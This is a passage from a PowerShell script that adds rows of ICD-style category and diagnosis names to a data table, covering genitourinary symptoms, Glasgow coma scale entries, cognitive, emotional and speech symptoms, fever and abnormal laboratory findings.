urine, unspecified") + $null = $DiagnosisList.Rows.Add("Anuria and oliguria","Anuria and oliguria") + $null = $DiagnosisList.Rows.Add("Polyuria","Frequency of micturition") + $null = $DiagnosisList.Rows.Add("Polyuria","Nocturia") + $null = $DiagnosisList.Rows.Add("Polyuria","Other polyuria") + $null = $DiagnosisList.Rows.Add("Urethral discharge","Urethral discharge without blood") + $null = $DiagnosisList.Rows.Add("Urethral discharge","Hematospermia") + $null = $DiagnosisList.Rows.Add("Urethral discharge","Urethral discharge, unspecified") + $null = $DiagnosisList.Rows.Add("Sexual dysfunction, unspecified","Sexual dysfunction, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified symptoms and signs involving the genitourinary system","Extravasation of urine") + $null = $DiagnosisList.Rows.Add("Other difficulties with micturition","Hesitancy of micturition") + $null = $DiagnosisList.Rows.Add("Other difficulties with micturition","Poor urinary stream") + $null = $DiagnosisList.Rows.Add("Other difficulties with micturition","Splitting of urinary stream") + $null = $DiagnosisList.Rows.Add("Other difficulties with micturition","Feeling of incomplete bladder emptying") + $null = $DiagnosisList.Rows.Add("Other difficulties with micturition","Urgency of urination") + $null = $DiagnosisList.Rows.Add("Other difficulties with micturition","Straining to void") + $null = $DiagnosisList.Rows.Add("Other difficulties with micturition","Need to immediately re-void") + $null = $DiagnosisList.Rows.Add("Other difficulties with micturition","Position dependent micturition") + $null = $DiagnosisList.Rows.Add("Other difficulties with micturition","Other difficulties with micturition") + $null = $DiagnosisList.Rows.Add("Extrarenal uremia","Extrarenal uremia") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the genitourinary system","Functional urinary incontinence") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the genitourinary system","Chronic bladder pain") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the genitourinary system","Unilateral non-palpable testicle") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the genitourinary system","Bilateral non-palpable testicles") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving the genitourinary system","Other symptoms and signs involving the genitourinary system") + $null = $DiagnosisList.Rows.Add("Unspecified symptoms and signs involving the genitourinary system","Unspecified symptoms and signs involving the genitourinary system") + $null = $DiagnosisList.Rows.Add("Somnolence, stupor and coma","Somnolence") + $null = $DiagnosisList.Rows.Add("Somnolence, stupor and coma","Stupor") + $null = $DiagnosisList.Rows.Add("Coma","Unspecified coma") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, never","Coma scale, eyes open, never, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, never","Coma scale, eyes open, never, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, never","Coma scale, eyes open, never, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, never","Coma scale, eyes open, never, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, never","Coma scale, eyes open, never, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, to pain","Coma scale, eyes open, to pain, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, to pain","Coma scale, eyes open, to pain, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, to pain","Coma scale, eyes open, to pain, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, to pain","Coma scale, eyes open, to pain, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, to pain","Coma scale, eyes open, to pain, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, to sound","Coma scale, eyes open, to sound, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, to sound","Coma scale, eyes open, to sound, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, to sound","Coma scale, eyes open, to sound, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, to sound","Coma scale, eyes open, to sound, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, to sound","Coma scale, eyes open, to sound, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, spontaneous","Coma scale, eyes open, spontaneous, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, spontaneous","Coma scale, eyes open, spontaneous, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, spontaneous","Coma scale, eyes open, spontaneous, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, spontaneous","Coma scale, eyes open, spontaneous, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, eyes open, spontaneous","Coma scale, eyes open, spontaneous, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, none","Coma scale, best verbal response, none, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, none","Coma scale, best verbal response, none, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, none","Coma scale, best verbal response, none, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, none","Coma scale, best verbal response, none, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, none","Coma scale, best verbal response, none, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, incomprehensible words","Coma scale, best verbal response, incomprehensible words, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, incomprehensible words","Coma scale, best verbal response, incomprehensible words, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, incomprehensible words","Coma scale, best verbal response, incomprehensible words, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, incomprehensible words","Coma scale, best verbal response, incomprehensible words, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, incomprehensible words","Coma scale, best verbal response, incomprehensible words, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, inappropriate words","Coma scale, best verbal response, inappropriate words, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, inappropriate words","Coma scale, best verbal response, inappropriate words, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, inappropriate words","Coma scale, best verbal response, inappropriate words, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, inappropriate words","Coma scale, best verbal response, inappropriate words, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, inappropriate words","Coma scale, best verbal response, inappropriate words, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, confused conversation","Coma scale, best verbal response, confused conversation, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, confused conversation","Coma scale, best verbal response, confused conversation, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, confused conversation","Coma scale, best verbal response, confused conversation, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, confused conversation","Coma scale, best verbal response, confused conversation, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, confused conversation","Coma scale, best verbal response, confused conversation, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, oriented","Coma scale, best verbal response, oriented, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, oriented","Coma scale, best verbal response, oriented, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, oriented","Coma scale, best verbal response, oriented, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, oriented","Coma scale, best verbal response, oriented, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best verbal response, oriented","Coma scale, best verbal response, oriented, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, none","Coma scale, best motor response, none, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, none","Coma scale, best motor response, none, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, none","Coma scale, best motor response, none, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, none","Coma scale, best motor response, none, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, none","Coma scale, best motor response, none, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, extension","Coma scale, best motor response, extension, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, extension","Coma scale, best motor response, extension, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, extension","Coma scale, best motor response, extension, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, extension","Coma scale, best motor response, extension, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, extension","Coma scale, best motor response, extension, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, abnormal","Coma scale, best motor response, abnormal, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, abnormal","Coma scale, best motor response, abnormal, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, abnormal","Coma scale, best motor response, abnormal, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, abnormal","Coma scale, best motor response, abnormal, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, abnormal","Coma scale, best motor response, abnormal, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, flexion withdrawal","Coma scale, best motor response, flexion withdrawal, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, flexion withdrawal","Coma scale, best motor response, flexion withdrawal, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, flexion withdrawal","Coma scale, best motor response, flexion withdrawal, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, flexion withdrawal","Coma scale, best motor response, flexion withdrawal, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, flexion withdrawal","Coma scale, best motor response, flexion withdrawal, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, localizes pain","Coma scale, best motor response, localizes pain, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, localizes pain","Coma scale, best motor response, localizes pain, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, localizes pain","Coma scale, best motor response, localizes pain, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, localizes pain","Coma scale, best motor response, localizes pain, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, localizes pain","Coma scale, best motor response, localizes pain, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, obeys commands","Coma scale, best motor response, obeys commands, unspecified time") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, obeys commands","Coma scale, best motor response, obeys commands, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, obeys commands","Coma scale, best motor response, obeys commands, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, obeys commands","Coma scale, best motor response, obeys commands, at hospital admission") + $null = $DiagnosisList.Rows.Add("Coma scale, best motor response, obeys commands","Coma scale, best motor response, obeys commands, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 13-15","Glasgow coma scale score 13-15, unspecified time") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 13-15","Glasgow coma scale score 13-15, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 13-15","Glasgow coma scale score 13-15, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 13-15","Glasgow coma scale score 13-15, at hospital admission") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 13-15","Glasgow coma scale score 13-15, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 9-12","Glasgow coma scale score 9-12, unspecified time") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 9-12","Glasgow coma scale score 9-12, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 9-12","Glasgow coma scale score 9-12, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 9-12","Glasgow coma scale score 9-12, at hospital admission") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 9-12","Glasgow coma scale score 9-12, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 3-8","Glasgow coma scale score 3-8, unspecified time") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 3-8","Glasgow coma scale score 3-8, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 3-8","Glasgow coma scale score 3-8, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 3-8","Glasgow coma scale score 3-8, at hospital admission") + $null = $DiagnosisList.Rows.Add("Glasgow coma scale score 3-8","Glasgow coma scale score 3-8, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Other coma, without documented Glasgow coma scale score, or with partial score reported","Other coma, without documented Glasgow coma scale score, or with partial score reported, unspecified time") + $null = $DiagnosisList.Rows.Add("Other coma, without documented Glasgow coma scale score, or with partial score reported","Other coma, without documented Glasgow coma scale score, or with partial score reported, in the field [EMT or ambulance]") + $null = $DiagnosisList.Rows.Add("Other coma, without documented Glasgow coma scale score, or with partial score reported","Other coma, without documented Glasgow coma scale score, or with partial score reported, at arrival to emergency department") + $null = $DiagnosisList.Rows.Add("Other coma, without documented Glasgow coma scale score, or with partial score reported","Other coma, without documented Glasgow coma scale score, or with partial score reported, at hospital admission") + $null = $DiagnosisList.Rows.Add("Other coma, without documented Glasgow coma scale score, or with partial score reported","Other coma, without documented Glasgow coma scale score, or with partial score reported, 24 hours or more after hospital admission") + $null = $DiagnosisList.Rows.Add("Persistent vegetative state","Persistent vegetative state") + $null = $DiagnosisList.Rows.Add("Transient alteration of awareness","Transient alteration of awareness") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving cognitive functions and awareness","Disorientation, unspecified") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving cognitive functions and awareness","Anterograde amnesia") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving cognitive functions and awareness","Retrograde amnesia") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving cognitive functions and awareness","Other amnesia") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving cognitive functions and awareness","Neurologic neglect syndrome") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving cognitive functions and awareness","Age-related cognitive decline") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving cognitive functions and awareness","Altered mental status, unspecified") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving cognitive functions and awareness","Borderline intellectual functioning") + $null = $DiagnosisList.Rows.Add("Other specified cognitive deficit","Attention and concentration deficit") + $null = $DiagnosisList.Rows.Add("Other specified cognitive deficit","Cognitive communication deficit") + $null = $DiagnosisList.Rows.Add("Other specified cognitive deficit","Visuospatial deficit") + $null = $DiagnosisList.Rows.Add("Other specified cognitive deficit","Psychomotor deficit") + $null = $DiagnosisList.Rows.Add("Other specified cognitive deficit","Frontal lobe and executive function deficit") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving cognitive functions and awareness","Other symptoms and signs involving cognitive functions and awareness") + $null = $DiagnosisList.Rows.Add("Unspecified symptoms and signs involving cognitive functions and awareness","Unspecified symptoms and signs involving cognitive functions and awareness") + $null = $DiagnosisList.Rows.Add("Dizziness and giddiness","Dizziness and giddiness") + $null = $DiagnosisList.Rows.Add("Disturbances of smell and taste","Anosmia") + $null = $DiagnosisList.Rows.Add("Disturbances of smell and taste","Parosmia") + $null = $DiagnosisList.Rows.Add("Disturbances of smell and taste","Parageusia") + $null = $DiagnosisList.Rows.Add("Disturbances of smell and taste","Other disturbances of smell and taste") + $null = $DiagnosisList.Rows.Add("Disturbances of smell and taste","Unspecified disturbances of smell and taste") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving general sensations and perceptions","Auditory hallucinations") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving general sensations and perceptions","Visual hallucinations") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving general sensations and perceptions","Other hallucinations") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving general sensations and perceptions","Hallucinations, unspecified") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving general sensations and perceptions","Other symptoms and signs involving general sensations and perceptions") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving general sensations and perceptions","Unspecified symptoms and signs involving general sensations and perceptions") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving emotional state","Nervousness") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving emotional state","Restlessness and agitation") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving emotional state","Unhappiness") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving emotional state","Demoralization and apathy") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving emotional state","Irritability and anger") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving emotional state","Hostility") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving emotional state","Violent behavior") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving emotional state","State of emotional shock and stress, unspecified") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving emotional state","Low self-esteem") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving emotional state","Worries") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving emotional state","Excessive crying of child, adolescent or adult") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving emotional state","Anhedonia") + $null = $DiagnosisList.Rows.Add("Homicidal and suicidal ideations","Homicidal ideations") + $null = $DiagnosisList.Rows.Add("Homicidal and suicidal ideations","Suicidal ideations") + $null = $DiagnosisList.Rows.Add("Emotional lability","Emotional lability") + $null = $DiagnosisList.Rows.Add("Impulsiveness","Impulsiveness") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving emotional state","Other symptoms and signs involving emotional state") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving appearance and behavior","Very low level of personal hygiene") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving appearance and behavior","Bizarre personal appearance") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving appearance and behavior","Strange and inexplicable behavior") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving appearance and behavior","Overactivity") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving appearance and behavior","Slowness and poor responsiveness") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving appearance and behavior","Suspiciousness and marked evasiveness") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving appearance and behavior","Undue concern and preoccupation with stressful events") + $null = $DiagnosisList.Rows.Add("Symptoms and signs involving appearance and behavior","Verbosity and circumstantial detail obscuring reason for contact") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving appearance and behavior","Obsessive-compulsive behavior") + $null = $DiagnosisList.Rows.Add("Other symptoms and signs involving appearance and behavior","Other symptoms and signs involving appearance and behavior") + $null = $DiagnosisList.Rows.Add("Dysphasia and aphasia","Aphasia") + $null = $DiagnosisList.Rows.Add("Dysphasia and aphasia","Dysphasia") + $null = $DiagnosisList.Rows.Add("Dysarthria and anarthria","Dysarthria and anarthria") + $null = $DiagnosisList.Rows.Add("Other speech disturbances","Slurred speech") + $null = $DiagnosisList.Rows.Add("Other speech disturbances","Fluency disorder in conditions classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other speech disturbances","Other speech disturbances") + $null = $DiagnosisList.Rows.Add("Unspecified speech disturbances","Unspecified speech disturbances") + $null = $DiagnosisList.Rows.Add("Dyslexia and other symbolic dysfunctions, not elsewhere classified","Dyslexia and alexia") + $null = $DiagnosisList.Rows.Add("Dyslexia and other symbolic dysfunctions, not elsewhere classified","Agnosia") + $null = $DiagnosisList.Rows.Add("Dyslexia and other symbolic dysfunctions, not elsewhere classified","Apraxia") + $null = $DiagnosisList.Rows.Add("Dyslexia and other symbolic dysfunctions, not elsewhere classified","Visual agnosia") + $null = $DiagnosisList.Rows.Add("Dyslexia and other symbolic dysfunctions, not elsewhere classified","Other symbolic dysfunctions") + $null = $DiagnosisList.Rows.Add("Dyslexia and other symbolic dysfunctions, not elsewhere classified","Unspecified symbolic dysfunctions") + $null = $DiagnosisList.Rows.Add("Voice and resonance disorders","Dysphonia") + $null = $DiagnosisList.Rows.Add("Voice and resonance disorders","Aphonia") + $null = $DiagnosisList.Rows.Add("Hypernasality and hyponasality","Hypernasality") + $null = $DiagnosisList.Rows.Add("Hypernasality and hyponasality","Hyponasality") + $null = $DiagnosisList.Rows.Add("Other voice and resonance disorders","Other voice and resonance disorders") + $null = $DiagnosisList.Rows.Add("Unspecified voice and resonance disorder","Unspecified voice and resonance disorder") + $null = $DiagnosisList.Rows.Add("Fever of other and unknown origin","Drug induced fever") + $null = $DiagnosisList.Rows.Add("Other specified fever","Fever presenting with conditions classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other specified fever","Postprocedural fever") + $null = $DiagnosisList.Rows.Add("Other specified fever","Postvaccination fever") + $null = $DiagnosisList.Rows.Add("Other specified fever","Febrile nonhemolytic transfusion reaction") + $null = $DiagnosisList.Rows.Add("Fever, unspecified","Fever, unspecified") + $null = $DiagnosisList.Rows.Add("Headache","Headache") + $null = $DiagnosisList.Rows.Add("Pain, unspecified","Pain, unspecified") + $null = $DiagnosisList.Rows.Add("Malaise and fatigue","Neoplastic (malignant) related fatigue") + $null = $DiagnosisList.Rows.Add("Malaise and fatigue","Weakness") + $null = $DiagnosisList.Rows.Add("Malaise and fatigue","Functional quadriplegia") + $null = $DiagnosisList.Rows.Add("Other malaise and fatigue","Other malaise") + $null = $DiagnosisList.Rows.Add("Other malaise and fatigue","Chronic fatigue, unspecified") + $null = $DiagnosisList.Rows.Add("Other malaise and fatigue","Other fatigue") + $null = $DiagnosisList.Rows.Add("Age-related physical debility","Age-related physical debility") + $null = $DiagnosisList.Rows.Add("Syncope and collapse","Syncope and collapse") + $null = $DiagnosisList.Rows.Add("Febrile convulsions","Simple febrile convulsions") + $null = $DiagnosisList.Rows.Add("Febrile convulsions","Complex febrile convulsions") + $null = $DiagnosisList.Rows.Add("Post traumatic seizures","Post traumatic seizures") + $null = $DiagnosisList.Rows.Add("Unspecified convulsions","Unspecified convulsions") + $null = $DiagnosisList.Rows.Add("Shock, not elsewhere classified","Cardiogenic shock") + $null = $DiagnosisList.Rows.Add("Shock, not elsewhere classified","Hypovolemic shock") + $null = $DiagnosisList.Rows.Add("Shock, not elsewhere classified","Other shock") + $null = $DiagnosisList.Rows.Add("Shock, not elsewhere classified","Shock, unspecified") + $null = $DiagnosisList.Rows.Add("Hemorrhage, not elsewhere classified","Hemorrhage, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Enlarged lymph nodes","Localized enlarged lymph nodes") + $null = $DiagnosisList.Rows.Add("Enlarged lymph nodes","Generalized enlarged lymph nodes") + $null = $DiagnosisList.Rows.Add("Enlarged lymph nodes","Enlarged lymph nodes, unspecified") + $null = $DiagnosisList.Rows.Add("Edema, not elsewhere classified","Localized edema") + $null = $DiagnosisList.Rows.Add("Edema, not elsewhere classified","Generalized edema") + $null = $DiagnosisList.Rows.Add("Edema, not elsewhere classified","Edema, unspecified") + $null = $DiagnosisList.Rows.Add("Generalized hyperhidrosis","Generalized hyperhidrosis") + $null = $DiagnosisList.Rows.Add("Lack of expected normal physiological development in childhood and adults","Delayed milestone in childhood") + $null = $DiagnosisList.Rows.Add("Other and unspecified lack of expected normal physiological development in childhood","Unspecified lack of expected normal physiological development in childhood") + $null = $DiagnosisList.Rows.Add("Other and unspecified lack of expected normal physiological development in childhood","Failure to thrive (child)") + $null = $DiagnosisList.Rows.Add("Other and unspecified lack of expected normal physiological development in childhood","Short stature (child)") + $null = $DiagnosisList.Rows.Add("Other and unspecified lack of expected normal physiological development in childhood","Other lack of expected normal physiological development in childhood") + $null = $DiagnosisList.Rows.Add("Adult failure to thrive","Adult failure to thrive") + $null = $DiagnosisList.Rows.Add("Symptoms and signs concerning food and fluid intake","Anorexia") + $null = $DiagnosisList.Rows.Add("Symptoms and signs concerning food and fluid intake","Polydipsia") + $null = $DiagnosisList.Rows.Add("Symptoms and signs concerning food and fluid intake","Polyphagia") + $null = $DiagnosisList.Rows.Add("Symptoms and signs concerning food and fluid intake","Feeding difficulties") + $null = $DiagnosisList.Rows.Add("Symptoms and signs concerning food and fluid intake","Abnormal weight loss") + $null = $DiagnosisList.Rows.Add("Symptoms and signs concerning food and fluid intake","Abnormal weight gain") + $null = $DiagnosisList.Rows.Add("Symptoms and signs concerning food and fluid intake","Underweight") + $null = $DiagnosisList.Rows.Add("Symptoms and signs concerning food and fluid intake","Other symptoms and signs concerning food and fluid intake") + $null = $DiagnosisList.Rows.Add("Cachexia","Cachexia") + $null = $DiagnosisList.Rows.Add("Systemic inflammatory response syndrome (SIRS) of non-infectious origin","Systemic inflammatory response syndrome (SIRS) of non-infectious origin without acute organ dysfunction") + $null = $DiagnosisList.Rows.Add("Systemic inflammatory response syndrome (SIRS) of non-infectious origin","Systemic inflammatory response syndrome (SIRS) of non-infectious origin with acute organ dysfunction") + $null = $DiagnosisList.Rows.Add("Severe sepsis","Severe sepsis without septic shock") + $null = $DiagnosisList.Rows.Add("Severe sepsis","Severe sepsis with septic shock") + $null = $DiagnosisList.Rows.Add("Other general symptoms and signs","Hypothermia, not associated with low environmental temperature") + $null = $DiagnosisList.Rows.Add("Nonspecific symptoms peculiar to infancy","Excessive crying of infant (baby)") + $null = $DiagnosisList.Rows.Add("Nonspecific symptoms peculiar to infancy","Fussy infant (baby)") + $null = $DiagnosisList.Rows.Add("Nonspecific symptoms peculiar to infancy","Apparent life threatening event in infant (ALTE)") + $null = $DiagnosisList.Rows.Add("Nonspecific symptoms peculiar to infancy","Other nonspecific symptoms peculiar to infancy") + $null = $DiagnosisList.Rows.Add("Dry mouth, unspecified","Dry mouth, unspecified") + $null = $DiagnosisList.Rows.Add("Clubbing of fingers","Clubbing of fingers") + $null = $DiagnosisList.Rows.Add("Other general symptoms and signs","Early satiety") + $null = $DiagnosisList.Rows.Add("Other general symptoms and signs","Decreased libido") + $null = $DiagnosisList.Rows.Add("Other general symptoms and signs","Chills (without fever)") + $null = $DiagnosisList.Rows.Add("Other general symptoms and signs","Jaw pain") + $null = $DiagnosisList.Rows.Add("Other general symptoms and signs","Other general symptoms and signs") + $null = $DiagnosisList.Rows.Add("Illness, unspecified","Illness, unspecified") + $null = $DiagnosisList.Rows.Add("Elevated erythrocyte sedimentation rate and abnormality of plasma viscosity","Elevated erythrocyte sedimentation rate") + $null = $DiagnosisList.Rows.Add("Elevated erythrocyte sedimentation rate and abnormality of plasma viscosity","Abnormal plasma viscosity") + $null = $DiagnosisList.Rows.Add("Abnormality of red blood cells","Precipitous drop in hematocrit") + $null = $DiagnosisList.Rows.Add("Abnormality of red blood cells","Other abnormality of red blood cells") + $null = $DiagnosisList.Rows.Add("Abnormal glucose","Impaired fasting glucose") + $null = $DiagnosisList.Rows.Add("Abnormal glucose","Impaired glucose tolerance (oral)") + $null = $DiagnosisList.Rows.Add("Abnormal glucose","Prediabetes") + $null = $DiagnosisList.Rows.Add("Abnormal glucose","Other abnormal glucose") + $null = $DiagnosisList.Rows.Add("Hyperglycemia, unspecified","Hyperglycemia, unspecified") + $null = $DiagnosisList.Rows.Add("Abnormal serum enzyme levels","Nonspecific elevation of levels of transaminase and lactic acid dehydrogenase [LDH]") + $null = $DiagnosisList.Rows.Add("Abnormal serum enzyme levels","Abnormal levels of other serum enzymes") + $null = $DiagnosisList.Rows.Add("Abnormal serum enzyme levels","Abnormal serum enzyme level, unspecified") + $null = $DiagnosisList.Rows.Add("Inconclusive laboratory evidence of human immunodeficiency virus [HIV]","Inconclusive laboratory evidence of human immunodeficiency virus [HIV]") + $null = $DiagnosisList.Rows.Add("Other abnormal immunological findings in serum","Raised antibody titer") + $null = $DiagnosisList.Rows.Add("Nonspecific reaction to test for tuberculosis","Nonspecific reaction to tuberculin skin test without active tuberculosis") + $null = $DiagnosisList.Rows.Add("Nonspecific reaction to test for tuberculosis","Nonspecific reaction to cell mediated immunity measurement of gamma interferon antigen response without active tuberculosis") + $null = $DiagnosisList.Rows.Add("Other specified abnormal immunological findings in serum","Other specified abnormal immunological findings in serum") + $null = $DiagnosisList.Rows.Add("Abnormal immunological finding in serum, unspecified","Abnormal immunological finding in serum, unspecified") + $null = $DiagnosisList.Rows.Add("Other abnormalities of plasma proteins","Abnormality of albumin") + $null = $DiagnosisList.Rows.Add("Other abnormalities of plasma proteins","Abnormality of globulin") + $null = $DiagnosisList.Rows.Add("Other abnormalities of plasma proteins","Abnormality of alphafetoprotein") + $null = $DiagnosisList.Rows.Add("Other abnormalities of plasma proteins","Other specified abnormalities of plasma proteins") + $null = $DiagnosisList.Rows.Add("Other abnormalities of plasma proteins","Abnormality of plasma protein, unspecified") + $null = $DiagnosisList.Rows.Add("Findings of drugs and other substances, not normally found in blood","Finding of alcohol 